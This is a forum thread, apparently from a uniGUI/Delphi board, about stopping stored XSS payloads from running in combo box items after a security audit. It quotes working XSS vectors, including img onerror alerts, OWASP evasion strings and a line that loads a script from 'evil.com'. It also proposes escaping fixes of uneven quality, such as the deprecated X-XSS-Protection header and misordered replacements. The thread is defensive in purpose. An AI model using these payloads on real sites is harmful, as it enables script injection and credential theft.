tunicombobox How prevent from running html/JavaScript code in TUniComboBox and TUniDBCombox?

[JamesP]

Hello,
 

Columns of TUniDGGrid have property AllowHtml, that by default is True. If I set it to False it won't try to convert HTML/JavaScript code of field value when DBGrid is refresh.

If "BAD" user save text in field value is shown in TUniDBGrid the follow code won't load any alert dialog on screen (if column.AllowHtml=False😞

">Desc<img src="x" onerror=alert("hello")>

Is there any possibility to do the same on TUniComboBox and TUniDBComboBox as well?

Because, if there is TuniComboBox.Items have any line like (">Desc<img src="x" onerror=alert("hello")>) when user open combobox list items it will popup dialog like: 

Could you please help me out with follow issue I have got? Is it any solution to do the same as in TUniDBGrid's Column?

Thank you in advance.

Kind Regards

[irigsoft]

maybe this will help to you somehow: https://www.daniweb.com/digital-media/ui-ux-design/threads/71161/does-img-tag-has-disable-property#:~:text=i believe you,possible to disable.....%3F

or this: https://github.com/tinymce/tinymce/issues/5376

 

or you can write some code to check what is src for im tag and remove or disabled it:

https://stackoverflow.com/questions/11025352/remove-image-elements-from-string

https://www.sololearn.com/Discuss/2672663/how-to-write-a-js-code-to-remove-all-img-tags-from-html-page

 

 

https://www.google.com/search?lei=V2FmZLOpHpuHxc8PoOSk4Aw&q=remove img tag from html javascript&ved=2ahUKEwjzsMWWs__-AhWbQ_EDHSAyCcwQsKwBKAN6BAhTEAQ

 

 

 

[Sherzod]

Hello,

What if you will not use onerror at all?

[irigsoft]

7 minutes ago, Sherzod said:

Hello,

What if you will not use onerror at all?

Hi, I realized that onerror was set with javascript code by a "BAD" user.

If I'm right then any function could be called this way, am I wrong?

[Sherzod]

Hmm, don't know...

It is necessary to analyze, or think about the parser then...

[Sherzod]

13 hours ago, irigsoft said:

I realized that onerror was set with javascript code by a "BAD" user.

If I'm right then any function could be called this way, am I wrong?

Let's say, and what can this user run, what kind of malicious code !?

[irigsoft]

1 minute ago, Sherzod said:

Let's say, and what can this user run, what kind of malicious code !?

I dont know.

I realize that simple parser, maybe will be a enough protection from that.

[Sherzod]

But again, what kind of malicious code do you think a user might run?

12 minutes ago, irigsoft said:

I realize that simple parser, maybe will be a enough protection from that.

I think it's redundant...

[irigsoft]

27 minutes ago, Sherzod said:

But again, what kind of malicious code do you think a user might run?

https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html

Malformed IMG Tags

Originally found by Begeek (but cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tags:

<IMG """><SCRIPT>alert("XSS")</SCRIPT>"\>

fromCharCode

If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need:

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

 

so, maybe add XSS Header is enough: https://www.keycdn.com/blog/x-xss-protection

 

 

[JamesP]

Hi Sherzod and irigsofy

Thank you for suggestions. I understand that the system should stop that code (clean) before it get to the system, I mean it should not be in the Items in the first place.

I have created this topic for the reason I stated above, that if there is already malicious code in SQL table from where TUniComboBox takes Items, how to do something similar as it's implemented in TUniDBGrid.Column.AllowHtml := False, so that TUniComboBox won't try convert Items to Html.

It was the audit of our Web System and they identify several issues related to XSS. Our customers do not want to input/entry any values like: 

">Desc<img src="x" onerror=alert("hello")>

but if somebody want to breach the system we have to deal with that and prevent it, again I understand the system shouldn't allow to entry this code in system at all. You provided several links to articles where it describes how to clean text from html tags. All those solutions are in JavaScript I am not sure how to implement it in UniGUI project.

If you can provide a peace of code that I can use in my Delphi code it would be very helpful. It will be very appreciated.

The second type of issue is if the malicious code is already in SQL Tables and it came to there through different channel, not through our interface, we analyze the system and found follows:

The data entry (malicious code) to any TUniEdit or TUniMemo component doesn't do any wrong, but if later those values are appear in TUniDBGrid or In TUniComboBox or TUniListBox the system tries to execute the html/JavaScript code. I know how to deal with that in TUniDBGrid, but TUniComboBox and TUniListBox I don't.

That's why I raised this topic. Could you please help with that?

Kind Regards

[irigsoft]

"maybe add XSS Header is enough"

or is not enough!

1. you can attack some unpatched very old versions of Windows with the Metafile vulnerability present.

2. Yes, you can embed javascript directly into SVG.

This is not as dangerous as it sounds at first. Browsers that support SVG inside <img> tags do not support scripting inside the context. Ideally you should use SVG inside <embed> or <object> tags where scripting is supported by browsers. Yet, do not do it for user provided content!

3. allowing SVG inside <img src= may be dangerous: SVG opens several possible vectors to achieve execution context.

 <img src=a onerror=alert('XSS')> can be used to inject any arbitrary JavaScript

example for BAD javascript: <img src=a onerror="x=document.createElement('script');x.src='https://evil.com/really_evil.js';document.body.appendChild(x)" />

4.  if you use a file://hackersRus.org/file URL,  IE will try to get the file using Windows file sharing (SMB). This sends login name and hashed password to the hackers machine. The hackers can then use those to attack back

5. One attack that can be done that other answers have not covered is denial of service

"You are on a forum, and somebody posts a message which has an embedded <img src="/logout" /> - this leads to everyone being logged out when the image gets loaded. Now, none of the users can use the forum, as long as they see that page."

 

and so on, all is commented here: https://security.stackexchange.com/questions/135513/what-could-an-img-src-xss-do

 

! " CSP stops this dead, highly recommended to take the time to create one.":  https://developer.mozilla.org/en-US/docs/Web/Security/CSP/Introducing_Content_Security_Policy

[irigsoft]

13 minutes ago, JamesP said:

If you can provide a peace of code that I can use in my Delphi code it would be very helpful.

Hello, Try to read all information from my topic (You will find many examples and code for protection even parser

 

[irigsoft]

23 minutes ago, JamesP said:

Could you please help with that

1. Add this header into on UniGUIServerModuleHTTPCommand - (Block XSS)

AResponseInfo.CustomHeaders.AddValue('X-XSS-Protection', '1; mode=block');

2. Parse (Replace) all data that come from components and go into database on UniGUIServerModuleHTTPCommand - replace symbols on Server Side

ARequestInfo.Document := StringReplace (ARequestInfo.Document,'<','&lt;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'>','&gt;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'&','&amp;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'"','&quot;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'''','&#x27;',[rfReplaceAll]);

ARequestInfo.Document := StringReplace (ARequestInfo.Document,'#','&num;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'(','&lpar;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,')','&rpar;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,';','&semi;',[rfReplaceAll]);
//ARequestInfo.Document := StringReplace (ARequestInfo.Document,'/','&sol;',[rfReplaceAll]);
 

3. Add this code into MainForm.Script - replace symbols on Client Side

//replace language symbols
function escapeHtml (text) {
  var map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#039;'
  };
  return text.replace(/[&<>"']/g, function(m) { return map[m]; });
};

and add this on every control that You want to use it:

//replace language symbols
TuniCombobox (YourComponent).JSInterface.JSAddListener('blur','function(){this.setValue(escapeHtml(this.getValue()))}');

 

4. Replace all symbols on Server side before INSERT/UPDATE statement into SQL database

 

Please, write back here if this code helped You or You find any other solution.

 

 

[Sherzod]

26 minutes ago, JamesP said:

so that TUniComboBox won't try convert Items to Html.

If you don't want to use html in general.

[JamesP]

21 minutes ago, irigsoft said:

Hello, Try to read all information from my topic (You will find many examples and code for protection even parser 😞

 

I had done it before I posted this topic. I added code in my project several days ago:

  AResponseInfo.CustomHeaders.AddValue('X-Frame-Options', 'DENY');
  AResponseInfo.CustomHeaders.AddValue ('Strict-Transport-Security', 'max-age=31536000; includeSubDomains; preload');
  AResponseInfo.CustomHeaders.AddValue('X-XSS-Protection', '1, mode=block');
 

TUniComboBox still an issue

 

[irigsoft]

12 minutes ago, JamesP said:

TUniComboBox still an issue

Please, try with all of my code above.

The problem with Combobox is that user can write "bad" script and this will be added into database.

You can combat this problem with client-side and server-side character substitution.

 

Working on the Internet is a dangerous job, so you should always keep in mind that a user can enter malicious code on purpose, and everything coming from a user should be checked (I think this should always be kept in mind)!

[JamesP]

20 minutes ago, irigsoft said:

1. Add this header into on UniGUIServerModuleHTTPCommand - (Block XSS)

AResponseInfo.CustomHeaders.AddValue('X-XSS-Protection', '1; mode=block');

2. Parse (Replace) all data that come from components and go into database on UniGUIServerModuleHTTPCommand - replace symbols on Server Side

ARequestInfo.Document := StringReplace (ARequestInfo.Document,'<','&lt;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'>','&gt;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'&','&amp;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'"','&quot;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'''','&#x27;',[rfReplaceAll]);

ARequestInfo.Document := StringReplace (ARequestInfo.Document,'#','&num;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'(','&lpar;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,')','&rpar;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,';','&semi;',[rfReplaceAll]);
//ARequestInfo.Document := StringReplace (ARequestInfo.Document,'/','&sol;',[rfReplaceAll]);
 

3. Add this code into MainForm.Script - replace symbols on Client Side

//replace language symbols
function escapeHtml (text) {
  var map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#039;'
  };
  return text.replace(/[&<>"']/g, function(m) { return map[m]; });
};

and add this on every control that You want to use it:

//replace language symbols
TuniCombobox (YourComponent).JSInterface.JSAddListener('blur','function(){this.setValue(escapeHtml(this.getValue()))}');

 

4. Replace all symbols on Server side before INSERT/UPDATE statement into SQL database

 

Please, write back here if this code helped You or You find any other solution.

 

 

Sorry, I haven't seen this your post yet when I responded previously:

-----------------------

I had done it before I posted this topic. I added code in my project several days ago:

AResponseInfo.CustomHeaders.AddValue('X-Frame-Options', 'DENY');
  AResponseInfo.CustomHeaders.AddValue ('Strict-Transport-Security', 'max-age=31536000; includeSubDomains; preload');
  AResponseInfo.CustomHeaders.AddValue('X-XSS-Protection', '1, mode=block');
 

TUniComboBox still an issue

-----------------------------------

I will try to implement it.

Thank you very much

 

[JamesP]

3 hours ago, irigsoft said:

1. Add this header into on UniGUIServerModuleHTTPCommand - (Block XSS)

AResponseInfo.CustomHeaders.AddValue('X-XSS-Protection', '1; mode=block');

2. Parse (Replace) all data that come from components and go into database on UniGUIServerModuleHTTPCommand - replace symbols on Server Side

ARequestInfo.Document := StringReplace (ARequestInfo.Document,'<','&lt;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'>','&gt;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'&','&amp;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'"','&quot;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'''','&#x27;',[rfReplaceAll]);

ARequestInfo.Document := StringReplace (ARequestInfo.Document,'#','&num;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'(','&lpar;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,')','&rpar;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,';','&semi;',[rfReplaceAll]);
//ARequestInfo.Document := StringReplace (ARequestInfo.Document,'/','&sol;',[rfReplaceAll]);
 

3. Add this code into MainForm.Script - replace symbols on Client Side

//replace language symbols
function escapeHtml (text) {
  var map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#039;'
  };
  return text.replace(/[&<>"']/g, function(m) { return map[m]; });
};

and add this on every control that You want to use it:

//replace language symbols
TuniCombobox (YourComponent).JSInterface.JSAddListener('blur','function(){this.setValue(escapeHtml(this.getValue()))}');

 

4. Replace all symbols on Server side before INSERT/UPDATE statement into SQL database

 

Please, write back here if this code helped You or You find any other solution.

 

 

Hi irigsoft

I have tried to implement the code as you suggested.

I added into MainForm.Script

//replace language symbols
function escapeHtml (text) {
  var map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#039;'
  };
  return text.replace(/[&<>"']/g, function(m) { return map[m]; });
};

Then onReady event of MainForm:

procedure TMainForm.UniFormReady(Sender: TObject);
begin
  TuniCombobox(cbTesting1).JSInterface.JSAddListener('blur','function(){this.setValue(escapeHtml(this.getValue()))}');
  TuniCombobox(cbTesting2).JSInterface.JSAddListener('blur','function(){this.setValue(escapeHtml(this.getValue()))}');

end;

Next I have got the button click event:

procedure TMainForm.UniButton20Click(Sender: TObject);
var
  sValue: string;
begin
  cbTesting2.Items.Clear;

  sValue := '<scripts>Do Something = onError("") </scripts>';
  cbTesting2.Items.Add(sValue);

  sValue := '">Desc<img src="x" onerror=alert("hello")>';
  cbTesting2.Items.Add(sValue);

  sValue := '">Desc<img src="x" onerror=alert("helloWorld")>';
  cbTesting2.Items.Add(sValue);
end;

At runtime:

When I click on uniButton20 and then click on standard combo box trigger icon of cbTesing2 Alert popup on screen:

If select the second option, that is: ">Desc<img src="x" onerror=alert("hello")>

Then if I move cursor to another component cbTesing2.Text become:

Then every time when I click on cbTesing and then move away the text is changed:

I mean, & replaced with &amp; then again &amp; replaced with &amp;amp; and etc...

If I expand the Item List again the Alert Message appears again.

The code: TuniCombobox(cbTesting2).JSInterface.JSAddListener('blur','function(){this.setValue(escapeHtml(this.getValue()))}');

Replace the text that's assigned to cbTesing2.Text and it doesn't do anything to cbTesing2.Items.

I wonder if there is any way to replace the item value when it's assigned to Items and not to Text of ComboBox?

Thank you for helping, I really appreciate it.

Kind Regards.

 

[irigsoft]

1 hour ago, JamesP said:

Replace the text that's assigned to cbTesing2.Text and it doesn't do anything to cbTesing2.Items.

Yes, it's work exact that way.

On Client Side replace all symbols in Control.

This is 1 step.

2 step is beffor save data in database on SQL script (on Server Side) You must replace all this (html )symbols.

 

1 hour ago, JamesP said:

I wonder if there is any way to replace the item value when it's assigned to Items and not to Text of ComboBox?

If you already have saved data with "bad" code, then You must find it and replace it when load data in TComboBox.

If You use TDBCombobox then I think here maybe @Sherzod will help with javascript code .